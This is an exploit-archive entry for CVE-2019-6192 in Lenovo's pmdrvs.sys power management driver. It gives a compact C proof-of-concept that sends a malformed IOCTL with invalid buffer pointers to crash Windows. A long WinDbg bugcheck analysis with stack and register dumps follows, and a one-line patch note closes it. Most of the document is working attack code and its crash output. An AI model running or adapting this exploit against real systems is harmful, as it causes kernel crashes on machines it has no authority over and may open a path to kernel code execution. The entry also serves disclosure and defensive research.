# Exploit Title: Lenovo Power Management Driver 1.67.17.48 - 'pmdrvs.sys' Denial of Service (PoC)
# Date: 2019-12-11
# Exploit Author: Nassim Asrir
# CVE: CVE-2019-6192
# Tested On: Windows 10(64bit) | ThinkPad T470p
# Vendor : https://www.lenovo.com/us/en/
# Ref : https://support.lenovo.com/us/fr/solutions/len-29334
# Description
# A vulnerability in pmdrvs.sys driver has been discovered in Lenovo Power Management Driver
# The vulnerability exists due to insuffiecient input buffer validation when the driver processes IOCTL codes
# Attackers can exploit this issue to cause a Denial of Service or possibly execute arbitrary code in kernel space.
# Exploit
#include <windows.h>
#include <stdio.h>
#include <conio.h>
int main(int argc, char **argv)
{
HANDLE hDevice;
DWORD bret;
char szDevice[] = "\\\\.\\pmdrvs";
printf("--[ Lenovo Power Management Driver pmdrvs.sys Denial Of Service ]--\n");
printf("Opening handle to driver..\n");
if ((hDevice = CreateFileA(szDevice, GENERIC_READ | GENERIC_WRITE,0,0,OPEN_EXISTING,0,NULL)) != INVALID_HANDLE_VALUE) {
printf("Device %s succesfully opened!\n", szDevice);
printf("\tHandle: %p\n", hDevice);
}
else
{
printf("Error: Error opening device %s\n", szDevice);
}
printf("\nPress any key to DoS..");
_getch();
bret = 0;
if (!DeviceIoControl(hDevice, 0x80862013, (LPVOID)0xdeadbeef, 0x0, (LPVOID)0xdeadbeef, 0x0, &bret, NULL))
{
printf("DeviceIoControl Error - bytes returned %#x\n", bret);
}
CloseHandle(hDevice);
return 0;
}
# RCA
2: kd> !analyze -v
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************
SYSTEM_SERVICE_EXCEPTION (3b)
An exception happened while executing a system service routine.
Arguments:
Arg1: 00000000c0000005, Exception code that caused the bugcheck
Arg2: fffff80428bf109d, Address of the instruction which caused the bugcheck
Arg3: ffffc709dee8ec50, Address of the context record for the exception that caused the bugcheck
Arg4: 0000000000000000, zero.
FAULTING_IP:
pmdrvs+109d
fffff804`28bf109d 8b07 mov eax,dword ptr [rdi]
CONTEXT: ffffc709dee8ec50 -- (.cxr 0xffffc709dee8ec50)
rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8
rdx=ffffca04ca8f8170 rsi=ffffca04ca8f8170 rdi=0000000000000000
rip=fffff80428bf109d rsp=ffffc709dee8f640 rbp=ffffca04cc188290
r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020
r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40
r14=0000000000000002 r15=0000000000000000
iopl=0 nv up ei pl zr na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010246
pmdrvs+0x109d:
fffff804`28bf109d 8b07 mov eax,dword ptr [rdi] ds:002b:00000000`00000000=????????
Resetting default scope
CPU_COUNT: 8
CPU_MHZ: af8
CPU_VENDOR: GenuineIntel
CPU_FAMILY: 6
CPU_MODEL: 9e
CPU_STEPPING: 9
CPU_MICROCODE: 0,0,0,0 (F,M,S,R) SIG: 8E'00000000 (cache) 0'00000000 (init)
BLACKBOXBSD: 1 (!blackboxbsd)
BLACKBOXPNP: 1 (!blackboxpnp)
CURRENT_IRQL: 0
ANALYSIS_SESSION_HOST: LAPTOP-SP
ANALYSIS_SESSION_TIME: 09-30-2019 20:29:54.0485
ANALYSIS_VERSION: 10.0.17763.132 amd64fre
LAST_CONTROL_TRANSFER: from fffff80428bf5060 to fffff80428bf109d
STACK_TEXT:
ffffc709`dee8f640 fffff804`28bf5060 : 00000000`00000000 ffff9980`05b00099 00000000`00000000 00000000`00000000 : pmdrvs+0x109d
ffffc709`dee8f6c0 fffff804`1f12dba9 : ffffca04`ca8f80a0 fffff804`1f6d6224 ffffca04`cc51ff20 00000000`00000000 : pmdrvs+0x5060
ffffc709`dee8f6f0 fffff804`1f6abb11 : ffffc709`dee8fa80 ffffca04`ca8f80a0 00000000`00000001 ffffca04`cc188290 : nt!IofCallDriver+0x59
ffffc709`dee8f730 fffff804`1f6d763c : ffffca04`00000000 ffffca04`cc188290 ffffc709`dee8fa80 ffffc709`dee8fa80 : nt!NtQueryInformationFile+0x1071
ffffc709`dee8f7e0 fffff804`1f64c356 : 00007fff`2fd66712 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtClose+0xffc
ffffc709`dee8f920 fffff804`1f27a305 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtDeviceIoControlFile+0x56
ffffc709`dee8f990 00007fff`33aaf844 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!setjmpex+0x7925
00000000`0068fcf8 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : 0x00007fff`33aaf844
THREAD_SHA1_HASH_MOD_FUNC: fea423dc9c9c08c703f6d9d5b0d8f7062b0ece68
THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 4653d18777ce51b05029c753677fc2c05d5811bb
THREAD_SHA1_HASH_MOD: c2a3dbda00dbcf5ade5303449052a7349d5c580b
FOLLOWUP_IP:
pmdrvs+109d
fffff804`28bf109d 8b07 mov eax,dword ptr [rdi]
FAULT_INSTR_CODE: 8941078b
SYMBOL_STACK_INDEX: 0
FOLLOWUP_NAME: MachineOwner
STACK_COMMAND: .cxr 0xffffc709dee8ec50 ; kb
BUGCHECK_STR: 2E8B5A19
EXCEPTION_CODE_STR: 2E8B5A19
EXCEPTION_STR: WRONG_SYMBOLS
PROCESS_NAME: ntoskrnl.wrong.symbols.exe
IMAGE_NAME: ntoskrnl.wrong.symbols.exe
MODULE_NAME: nt_wrong_symbols
SYMBOL_NAME: nt_wrong_symbols!2E8B5A19A70000
BUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145
DEFAULT_BUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145
PRIMARY_PROBLEM_CLASS: WRONG_SYMBOLS
FAILURE_BUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145_2E8B5A19_nt_wrong_symbols!2E8B5A19A70000
TARGET_TIME: 2019-09-30T19:27:36.000Z
OSBUILD: 17763
OSSERVICEPACK: 0
SERVICEPACK_NUMBER: 0
OS_REVISION: 0
SUITE_MASK: 272
PRODUCT_TYPE: 1
OSPLATFORM_TYPE: x64
OSNAME: Windows 10
OSEDITION: Windows 10 WinNt TerminalServer SingleUserTS
OS_LOCALE:
USER_LCID: 0
OSBUILD_TIMESTAMP: 1994-09-30 01:21:45
BUILDDATESTAMP_STR: 180914-1434
BUILDLAB_STR: rs5_release
BUILDOSVER_STR: 10.0.17763.1.amd64fre.rs5_release.180914-1434
ANALYSIS_SESSION_ELAPSED_TIME: ae
ANALYSIS_SOURCE: KM
FAILURE_ID_HASH_STRING: km:wrong_symbols_x64_17763.1.amd64fre.rs5_release.180914-1434_timestamp_940930-002145_2e8b5a19_nt_wrong_symbols!2e8b5a19a70000
FAILURE_ID_HASH: {f0486cd4-fec7-73b9-14c0-31bcf2dd24e1}
Followup: MachineOwner
---------
2: kd> u fffff804`28bf109d
pmdrvs+0x109d:
fffff804`28bf109d 8b07 mov eax,dword ptr [rdi]
fffff804`28bf109f 41894308 mov dword ptr [r11+8],eax
fffff804`28bf10a3 e858ffffff call pmdrvs+0x1000 (fffff804`28bf1000)
fffff804`28bf10a8 85c0 test eax,eax
fffff804`28bf10aa 0f8582000000 jne pmdrvs+0x1132 (fffff804`28bf1132)
fffff804`28bf10b0 488b8c2498000000 mov rcx,qword ptr [rsp+98h]
fffff804`28bf10b8 4885c9 test rcx,rcx
fffff804`28bf10bb 7475 je pmdrvs+0x1132 (fffff804`28bf1132)
2: kd> !for_each_frame .frame /r @$Frame
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx
00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx
rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b
rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000
rip=fffff8041f269040 rsp=ffffc709dee8e318 rbp=ffffc709dee8ea10
r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000
r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510
r14=0000000000000000 r15=ffffc709dee8f408
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
nt!KeBugCheckEx:
fffff804`1f269040 48894c2408 mov qword ptr [rsp+8],rcx ss:0018:ffffc709`dee8e320=000000000000003b
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
01 ffffc709`dee8e320 fffff804`1f279d3c nt!setjmpex+0x7f09
01 ffffc709`dee8e320 fffff804`1f279d3c nt!setjmpex+0x7f09
rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b
rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000
rip=fffff8041f27a8e9 rsp=ffffc709dee8e320 rbp=ffffc709dee8ea10
r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000
r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510
r14=0000000000000000 r15=ffffc709dee8f408
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
nt!setjmpex+0x7f09:
fffff804`1f27a8e9 90 nop
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
02 ffffc709`dee8e460 fffff804`1f271b4f nt!setjmpex+0x735c
02 ffffc709`dee8e460 fffff804`1f271b4f nt!setjmpex+0x735c
rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b
rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000
rip=fffff8041f279d3c rsp=ffffc709dee8e460 rbp=ffffc709dee8ea10
r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000
r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510
r14=0000000000000000 r15=ffffc709dee8f408
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
nt!setjmpex+0x735c:
fffff804`1f279d3c b801000000 mov eax,1
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
03 ffffc709`dee8e4a0 fffff804`1f1ca460 nt!_chkstk+0x41f
03 ffffc709`dee8e4a0 fffff804`1f1ca460 nt!_chkstk+0x41f
rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b
rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000
rip=fffff8041f271b4f rsp=ffffc709dee8e4a0 rbp=ffffc709dee8ea10
r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000
r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510
r14=0000000000000000 r15=ffffc709dee8f408
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
nt!_chkstk+0x41f:
fffff804`1f271b4f 0f1f00 nop dword ptr [rax]
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
04 ffffc709`dee8e4d0 fffff804`1f0d7c24 nt!RtlUnwindEx+0x3440
04 ffffc709`dee8e4d0 fffff804`1f0d7c24 nt!RtlUnwindEx+0x3440
rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b
rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000
rip=fffff8041f1ca460 rsp=ffffc709dee8e4d0 rbp=ffffc709dee8ea10
r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000
r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510
r14=0000000000000000 r15=ffffc709dee8f408
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
nt!RtlUnwindEx+0x3440:
fffff804`1f1ca460 8bd0 mov edx,eax
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
05 ffffc709`dee8ec20 fffff804`1f27a9c2 nt!ExReleaseAutoExpandPushLockExclusive+0x264
05 ffffc709`dee8ec20 fffff804`1f27a9c2 nt!ExReleaseAutoExpandPushLockExclusive+0x264
rax=ffffc709dee8e420 rbx=ffffc709dee8f408 rcx=000000000000003b
rdx=00000000c0000005 rsi=ffffc709dee8ec50 rdi=0000000000000000
rip=fffff8041f0d7c24 rsp=ffffc709dee8ec20 rbp=ffffc709dee8f150
r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000
r11=000000001f0b5000 r12=000000000010001f r13=ffffca04c1ca8d40
r14=ffffc709dee8f4b0 r15=0000000000000000
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
nt!ExReleaseAutoExpandPushLockExclusive+0x264:
fffff804`1f0d7c24 84c0 test al,al
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
06 ffffc709`dee8f2d0 fffff804`1f276cae nt!setjmpex+0x7fe2
06 ffffc709`dee8f2d0 fffff804`1f276cae nt!setjmpex+0x7fe2
rax=ffffc709dee8e420 rbx=ffffca04ca8f80a0 rcx=000000000000003b
rdx=00000000c0000005 rsi=ffffca04ca8f8170 rdi=0000000000000000
rip=fffff8041f27a9c2 rsp=ffffc709dee8f2d0 rbp=ffffc709dee8f530
r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000
r11=000000001f0b5000 r12=0000000000000000 r13=ffffca04c1ca8d40
r14=0000000000000002 r15=0000000000000000
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
nt!setjmpex+0x7fe2:
fffff804`1f27a9c2 488d8c2400010000 lea rcx,[rsp+100h]
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
07 ffffc709`dee8f4b0 fffff804`28bf109d nt!setjmpex+0x42ce
07 ffffc709`dee8f4b0 fffff804`28bf109d nt!setjmpex+0x42ce
rax=ffffc709dee8e420 rbx=ffffca04ca8f80a0 rcx=000000000000003b
rdx=00000000c0000005 rsi=ffffca04ca8f8170 rdi=0000000000000000
rip=fffff8041f276cae rsp=ffffc709dee8f4b0 rbp=ffffc709dee8f530
r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000
r11=000000001f0b5000 r12=0000000000000000 r13=ffffca04c1ca8d40
r14=0000000000000002 r15=0000000000000000
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
nt!setjmpex+0x42ce:
fffff804`1f276cae 440f20c0 mov rax,cr8
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
08 ffffc709`dee8f640 fffff804`28bf5060 pmdrvs+0x109d
08 ffffc709`dee8f640 fffff804`28bf5060 pmdrvs+0x109d
rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8
rdx=ffffca04ca8f8170 rsi=ffffca04ca8f8170 rdi=0000000000000000
rip=fffff80428bf109d rsp=ffffc709dee8f640 rbp=ffffca04cc188290
r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020
r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40
r14=0000000000000002 r15=0000000000000000
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
pmdrvs+0x109d:
fffff804`28bf109d 8b07 mov eax,dword ptr [rdi] ds:002b:00000000`00000000=????????
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
09 ffffc709`dee8f6c0 fffff804`1f12dba9 pmdrvs+0x5060
09 ffffc709`dee8f6c0 fffff804`1f12dba9 pmdrvs+0x5060
rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8
rdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=0000000000000000
rip=fffff80428bf5060 rsp=ffffc709dee8f6c0 rbp=ffffca04cc188290
r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020
r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40
r14=0000000000000002 r15=0000000000000000
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
pmdrvs+0x5060:
fffff804`28bf5060 eb28 jmp pmdrvs+0x508a (fffff804`28bf508a)
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
0a ffffc709`dee8f6f0 fffff804`1f6abb11 nt!IofCallDriver+0x59
0a ffffc709`dee8f6f0 fffff804`1f6abb11 nt!IofCallDriver+0x59
rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8
rdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=ffffca04cc188290
rip=fffff8041f12dba9 rsp=ffffc709dee8f6f0 rbp=ffffca04cc188290
r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020
r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40
r14=0000000000000002 r15=0000000000000000
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
nt!IofCallDriver+0x59:
fffff804`1f12dba9 4883c438 add rsp,38h
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
0b ffffc709`dee8f730 fffff804`1f6d763c nt!NtQueryInformationFile+0x1071
0b ffffc709`dee8f730 fffff804`1f6d763c nt!NtQueryInformationFile+0x1071
rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8
rdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=ffffca04cc188290
rip=fffff8041f6abb11 rsp=ffffc709dee8f730 rbp=ffffca04cc188290
r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020
r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40
r14=0000000000000002 r15=0000000000000000
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
nt!NtQueryInformationFile+0x1071:
fffff804`1f6abb11 448bf0 mov r14d,eax
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
0c ffffc709`dee8f7e0 fffff804`1f64c356 nt!NtClose+0xffc
0c ffffc709`dee8f7e0 fffff804`1f64c356 nt!NtClose+0xffc
rax=fffff80428bf5020 rbx=ffffca04cc188290 rcx=ffffc709dee8f6d8
rdx=ffffca04ca8f8170 rsi=0000000000000000 rdi=ffffca04ca8f80a0
rip=fffff8041f6d763c rsp=ffffc709dee8f7e0 rbp=ffffc709dee8fa80
r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020
r11=ffffc709dee8f6b8 r12=ffffca04ca8f81b8 r13=fffff780000002dc
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
nt!NtClose+0xffc:
fffff804`1f6d763c eb25 jmp nt!NtClose+0x1023 (fffff804`1f6d7663)
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
0d ffffc709`dee8f920 fffff804`1f27a305 nt!NtDeviceIoControlFile+0x56
0d ffffc709`dee8f920 fffff804`1f27a305 nt!NtDeviceIoControlFile+0x56
rax=fffff80428bf5020 rbx=ffffca04c88b3080 rcx=ffffc709dee8f6d8
rdx=ffffca04ca8f8170 rsi=000000000068fd18 rdi=ffffc709dee8f9a8
rip=fffff8041f64c356 rsp=ffffc709dee8f920 rbp=ffffc709dee8fa80
r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020
r11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
nt!NtDeviceIoControlFile+0x56:
fffff804`1f64c356 4883c468 add rsp,68h
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
0e ffffc709`dee8f990 00007fff`33aaf844 nt!setjmpex+0x7925
0e ffffc709`dee8f990 00007fff`33aaf844 nt!setjmpex+0x7925
rax=fffff80428bf5020 rbx=ffffca04c88b3080 rcx=ffffc709dee8f6d8
rdx=ffffca04ca8f8170 rsi=000000000068fd18 rdi=ffffc709dee8f9a8
rip=fffff8041f27a305 rsp=ffffc709dee8f990 rbp=ffffc709dee8fa80
r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020
r11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
nt!setjmpex+0x7925:
fffff804`1f27a305 0f1f00 nop dword ptr [rax]
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
0f 00000000`0068fcf8 00000000`00000000 0x00007fff`33aaf844
0f 00000000`0068fcf8 00000000`00000000 0x00007fff`33aaf844
rax=fffff80428bf5020 rbx=0000000000000000 rcx=ffffc709dee8f6d8
rdx=ffffca04ca8f8170 rsi=00000000deadbeef rdi=000000000000004c
rip=00007fff33aaf844 rsp=000000000068fcf8 rbp=000000000000004c
r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020
r11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
00007fff`33aaf844 ?? ???
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx
# Mitigation
Update to Lenovo Power Management driver version 1.67.17.48 or higher
